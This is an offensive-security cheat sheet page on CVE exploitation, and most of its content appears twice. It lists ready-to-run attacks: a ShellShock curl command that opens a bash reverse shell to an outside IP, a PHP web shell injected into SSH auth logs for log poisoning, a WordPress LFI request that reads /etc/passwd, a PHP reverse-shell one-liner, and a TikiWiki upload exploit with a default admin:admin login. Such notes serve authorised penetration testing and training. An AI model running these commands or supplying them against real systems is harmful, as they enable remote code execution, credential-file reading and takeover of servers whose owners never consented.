CVE exploitation

PreviouscUrl cheatsheet NextJavaScript Obfuscation/Deobfuscation

Last updated 6 months ago

CVE exploitation

CGI ShellShock web vulnerabilities

https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/

# Directory Brute Forcing
gobuster dir -u http://172.25.210.128 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

# ShellShock Vulnerability Detection
nmap -n -p80 --script http-shershock --script-args uri=/cgi-bin/keygen,cmd=ls 172.25.30.5

# Reverse Shell via ShellShock Exploit
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi

# Metasploit module to detect ShellShock
multi/http/apache_mod_cgi_bash_env_exec

# Python code to detect ShellShok: https://github.com/erinzm/shellshocker
shellshocker.py [OPTIONS] URL

TikiWiki File Upload vulnerability

To exploit the TikiWiki File Upload vulnerability, use the following Metasploit command to perform an unrestricted file upload:

# Use unix/webapp/tikiwiki_upload_exec
# If you find this unrestricted file upload, you can use the msfconsole command to exploit it.
# The default login page of tikiwiki is usually admin:admin
Use unix/webapp/tikiwiki_upload_exec

Log Poisoning and LFI example CVE-2018-7422 (Wordpress)

# Inject a malicious PHP payload into SSH to store it in the auth log file
Ssh '<?php system($_GET["c"]); ?>@IP'

# Exploit a Local File Inclusion (LFI) vulnerability in WordPress (CVE-2018-7422)
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

# Combine LFI and log poisoning to get a shell, inject PHP reverse shell into a specific machine
ajax_path=var/log/auth.log&c=ifconfig

# PHP code to establish a reverse shell to a remote host
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Explanation:

The Ssh '<?php system($_GET["c"]); ?>@IP' command illustrates injecting a PHP payload to execute commands on the target system via SSH log poisoning.
The LFI example shows how to access the /etc/passwd file using a vulnerable WordPress plugin, indicating a directory traversal attack.
Combining LFI and log poisoning involves altering application logs to include malicious PHP code, leading to code execution when the log file is included via LFI.
The PHP reverse shell command uses socket programming to connect back to an attacker's machine, offering a shell interface for remote command execution.

PreviouscUrl cheatsheet NextJavaScript Obfuscation/Deobfuscation

Last updated 6 months ago

CGI ShellShock web vulnerabilities

https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/

# Directory Brute Forcing
gobuster dir -u http://172.25.210.128 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

# ShellShock Vulnerability Detection
nmap -n -p80 --script http-shershock --script-args uri=/cgi-bin/keygen,cmd=ls 172.25.30.5

# Reverse Shell via ShellShock Exploit
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi

# Metasploit module to detect ShellShock
multi/http/apache_mod_cgi_bash_env_exec

# Python code to detect ShellShok: https://github.com/erinzm/shellshocker
shellshocker.py [OPTIONS] URL

TikiWiki File Upload vulnerability

To exploit the TikiWiki File Upload vulnerability, use the following Metasploit command to perform an unrestricted file upload:

# Use unix/webapp/tikiwiki_upload_exec
# If you find this unrestricted file upload, you can use the msfconsole command to exploit it.
# The default login page of tikiwiki is usually admin:admin
Use unix/webapp/tikiwiki_upload_exec

Log Poisoning and LFI example CVE-2018-7422 (Wordpress)

# Inject a malicious PHP payload into SSH to store it in the auth log file
Ssh '<?php system($_GET["c"]); ?>@IP'

# Exploit a Local File Inclusion (LFI) vulnerability in WordPress (CVE-2018-7422)
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

# Combine LFI and log poisoning to get a shell, inject PHP reverse shell into a specific machine
ajax_path=var/log/auth.log&c=ifconfig

# PHP code to establish a reverse shell to a remote host
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

GitHub - RoqueNight/LFI---RCE-Cheat-Sheet: Transition form local file inclusion attacks to remote code exectionGitHub

Explanation:

The Ssh '<?php system($_GET["c"]); ?>@IP' command illustrates injecting a PHP payload to execute commands on the target system via SSH log poisoning.
The LFI example shows how to access the /etc/passwd file using a vulnerable WordPress plugin, indicating a directory traversal attack.
Combining LFI and log poisoning involves altering application logs to include malicious PHP code, leading to code execution when the log file is included via LFI.
The PHP reverse shell command uses socket programming to connect back to an attacker's machine, offering a shell interface for remote command execution.